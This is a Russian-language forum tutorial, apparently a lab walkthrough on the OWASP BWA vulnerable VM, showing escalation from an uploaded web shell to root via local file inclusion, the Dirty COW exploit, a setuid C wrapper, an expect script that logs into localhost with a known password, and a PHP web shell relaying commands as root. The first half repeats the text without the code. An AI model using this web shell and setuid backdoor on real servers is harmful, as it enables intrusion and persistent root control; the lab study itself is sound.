Представьте, что у нас есть веб-шелл на сайте, но другого доступа к серверу, кроме как через веб, мы не имеем. При этом мы хотим повысить свои привилегии до root. Ниже я расскажу, как это можно сделать.
Для экспериментов я выбрал уязвимую виртуальную машину
И так, устанавливаем OWASPbwa, запускаем, дожидаемся загрузки и смотрим ip-адрес, к которому мы подключимся через браузер. Логиниться в ОС не нужно.
Для чистоты эксперимента зальем веб-шел через какое-нибудь уязвимое приложение, коих тут предостаточно. Переходим в раздел Mutillidae II
И в меню находим нужную нам уязвимость, с помощью которой зальем шелл на сервер
Веб-шелл загружен в директорию /tmp:
Надо как-то подключиться к нему. В этом нам поможет уязвимость local file include. Проверяем файл /etc/passwd
Уязвимость есть. Таким же образом подключаем загруженый ранее шелл. Немного мешает обзору меню от Mutillidae II, но не критично:
Этот веб-шелл мы используем для того, что бы загрузить на сервер файл с кодом эксплоита, скомпилировать его и запустить на выполнение. Эксплоит создаст в системе нового пользователя codeby с паролем codeby с правами root.
Скачиваем эксплоит отсюда -
На выходе получим бинарник dirtycow:
Запускаем эксплоит. Вторым аргументом сразу указываем пароль, который хотим присвоить новому пользователю.
Ждем пару минут и видим уведомление, что пользователь c именем codeby и паролем codeby создан:
По легенде подключиться по ssh или telnet к серверу мы не можем, бэк-коннекта тоже нет. Задача состоит в том, что бы теперь выполнять команды от нового root-пользователя через браузер.
В поисках решения проблемы я нашел статью на
Создаем файл на локальном сервере,
Загружаем файл на веб-сервер в /tmp и компилируем
В /tmp появился новый файл suid с правами -rwxr-x--x. Устанавливаем ему suid-бит:
Теперь его права доступа должны быть -rwsr-x--x:
символ x сменился на символ s, бит suid установлен.
Попробуем выполнить через наш suid-ник команду id. Часть экрана скрыта за меню, поэтому для ценителей особых извращений сделаю вот так - сохраню вывод команды в файл id:
и выведу содержимое файла в браузер:
Команда выполнилась от пользователя www-data, как и ожидалось. Чтобы команда выполнилась от рута, нужно сделать владельцем suid-файла рута. И делать это надо конечно-же из под рута. Но как? Пользователю www-data нельзя выполнять команды от sudo или su.
Выход такой — мы из веб-шелла выполним ssh-подключение к 127.0.0.1 с известным именем и паролем рут-пользователя (codeby:codeby) и выполним через ssh команду, которой сделаем пользователя codeby владельцем suid-файла:
Тут оказалось тоже не все так просто. Веб-шелл после подключения ssh не выводит в браузер запрос пароля, поэтому будем использовать скрипт, который
Загружаем скрипт на веб-сервер в /tmp, делаем его исполняемым и выполняем его в консоли веб-шелла:
Если все прошло нормально, видим, что владелец suid-файла сменился:
Правда и suid-бит после смены владельца сбросился. Установим его еще раз от рута. Для этого в script.sh надо соответственно подправить отправляемую команду и выпонить скрипт. Теперь все нормально:
Пробуем выполнить через suid-файл команду id:
Как видим, теперь команда выполнилась от рута. Что ж, осталось автоматизировать использование шеллом нашего suid-файла, чтоб каждый раз не вводить ./suid password foo bar, а сразу выполнять нужную команду.
Возьмем такой простой php-вебшелл:
И в строке, где выполняется функция system() сделаем маленькую модификацию:
Назовем наш файл с шеллом root_shell.php и загрузим на веб-сервер в /tmp.
Что бы никакие боковые меню больше не мешали обзору, сразу переместим шелл в /var/www:
и переходим в шел по адресу 192.168.56.103/root_shell.php
Что бы выпонить команду, в адресной строке используйте параметр cmd:
Команда id выпонилась от root (codeby)
На этом все. Спасибо, если дочитали и затестили способ )
Для экспериментов я выбрал уязвимую виртуальную машину
Ссылка скрыта от гостей
. На ней установлена Ubuntu с ядром 2.6.32-25-generic-pae, имеющим уязвимость
Ссылка скрыта от гостей
. Проэксплуатировав данную уязвимость, мы сможем повысить свои привилегии в системе до root. На гитхабе и exploit-db я нашел несколько подходящих эксплоитов, но успешно скомпилировался и сработал только один.И так, устанавливаем OWASPbwa, запускаем, дожидаемся загрузки и смотрим ip-адрес, к которому мы подключимся через браузер. Логиниться в ОС не нужно.
Для чистоты эксперимента зальем веб-шел через какое-нибудь уязвимое приложение, коих тут предостаточно. Переходим в раздел Mutillidae II
И в меню находим нужную нам уязвимость, с помощью которой зальем шелл на сервер
Веб-шелл загружен в директорию /tmp:
Надо как-то подключиться к нему. В этом нам поможет уязвимость local file include. Проверяем файл /etc/passwd
Уязвимость есть. Таким же образом подключаем загруженый ранее шелл. Немного мешает обзору меню от Mutillidae II, но не критично:
Этот веб-шелл мы используем для того, что бы загрузить на сервер файл с кодом эксплоита, скомпилировать его и запустить на выполнение. Эксплоит создаст в системе нового пользователя codeby с паролем codeby с правами root.
Скачиваем эксплоит отсюда -
Ссылка скрыта от гостей
. Загружаем его на веб-сервер в /tmp и компилируем:На выходе получим бинарник dirtycow:
Запускаем эксплоит. Вторым аргументом сразу указываем пароль, который хотим присвоить новому пользователю.
Ждем пару минут и видим уведомление, что пользователь c именем codeby и паролем codeby создан:
По легенде подключиться по ssh или telnet к серверу мы не можем, бэк-коннекта тоже нет. Задача состоит в том, что бы теперь выполнять команды от нового root-пользователя через браузер.
В поисках решения проблемы я нашел статью на
Ссылка скрыта от гостей
и посмотрел это
Ссылка скрыта от гостей
. Выход состоял в том, что бы создать suid-файл, который будет принадлежать root-юзеру codeby, и выполнять команды из веб-шелла через этот файл.
Ссылка скрыта от гостей
setuid и setgid являются флагами прав доступа в Unix, которые разрешают пользователям запускать исполняемые файлы с правами владельца или группы исполняемого файла.
Создаем файл на локальном сервере,
C:
#include <stdio.h>
#include <stdlib.h>
main (int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"codeby") == 0)
{
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}
Загружаем файл на веб-сервер в /tmp и компилируем
gcc suid.c -o suid
В /tmp появился новый файл suid с правами -rwxr-x--x. Устанавливаем ему suid-бит:
chmod 4751 suid
Теперь его права доступа должны быть -rwsr-x--x:
символ x сменился на символ s, бит suid установлен.
Попробуем выполнить через наш suid-ник команду id. Часть экрана скрыта за меню, поэтому для ценителей особых извращений сделаю вот так - сохраню вывод команды в файл id:
и выведу содержимое файла в браузер:
Команда выполнилась от пользователя www-data, как и ожидалось. Чтобы команда выполнилась от рута, нужно сделать владельцем suid-файла рута. И делать это надо конечно-же из под рута. Но как? Пользователю www-data нельзя выполнять команды от sudo или su.
Выход такой — мы из веб-шелла выполним ssh-подключение к 127.0.0.1 с известным именем и паролем рут-пользователя (codeby:codeby) и выполним через ssh команду, которой сделаем пользователя codeby владельцем suid-файла:
ssh codeby@127.0.0.1 chown codeby /tmp/suid
Тут оказалось тоже не все так просто. Веб-шелл после подключения ssh не выводит в браузер запрос пароля, поэтому будем использовать скрипт, который
Ссылка скрыта от гостей
и выполнит нужную команду. Создаем файл script.sh со следующим содержимым:
Bash:
#!/usr/bin/expect -f
set timeout 5
spawn ssh codeby@127.0.0.1 chown codeby /tmp/suid
#expect "(yes/no?)"
#send -- "yes\r"
expect "?*assword:*"
send -- "codeby\r"
send -- "\r"
expect eof
Загружаем скрипт на веб-сервер в /tmp, делаем его исполняемым и выполняем его в консоли веб-шелла:
chmod u+x script.sh
./script.sh
Если все прошло нормально, видим, что владелец suid-файла сменился:
Правда и suid-бит после смены владельца сбросился. Установим его еще раз от рута. Для этого в script.sh надо соответственно подправить отправляемую команду и выпонить скрипт. Теперь все нормально:
Пробуем выполнить через suid-файл команду id:
Как видим, теперь команда выполнилась от рута. Что ж, осталось автоматизировать использование шеллом нашего suid-файла, чтоб каждый раз не вводить ./suid password foo bar, а сразу выполнять нужную команду.
Возьмем такой простой php-вебшелл:
PHP:
<html>
<head>
<title>root_shell</title>
</head>
<body bgcolor=#000000 text=#6df207 ">
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system('$cmd');
echo "</pre>";
die;
}
?>
</body>
</html
И в строке, где выполняется функция system() сделаем маленькую модификацию:
system("/tmp/suid codeby '$cmd' ");
Назовем наш файл с шеллом root_shell.php и загрузим на веб-сервер в /tmp.
Что бы никакие боковые меню больше не мешали обзору, сразу переместим шелл в /var/www:
./suid codeby 'mv /tmp/root_shell.php /var/www/root_shell.php'
и переходим в шел по адресу 192.168.56.103/root_shell.php
Что бы выпонить команду, в адресной строке используйте параметр cmd:
Команда id выпонилась от root (codeby)
На этом все. Спасибо, если дочитали и затестили способ )
Вложения
Последнее редактирование: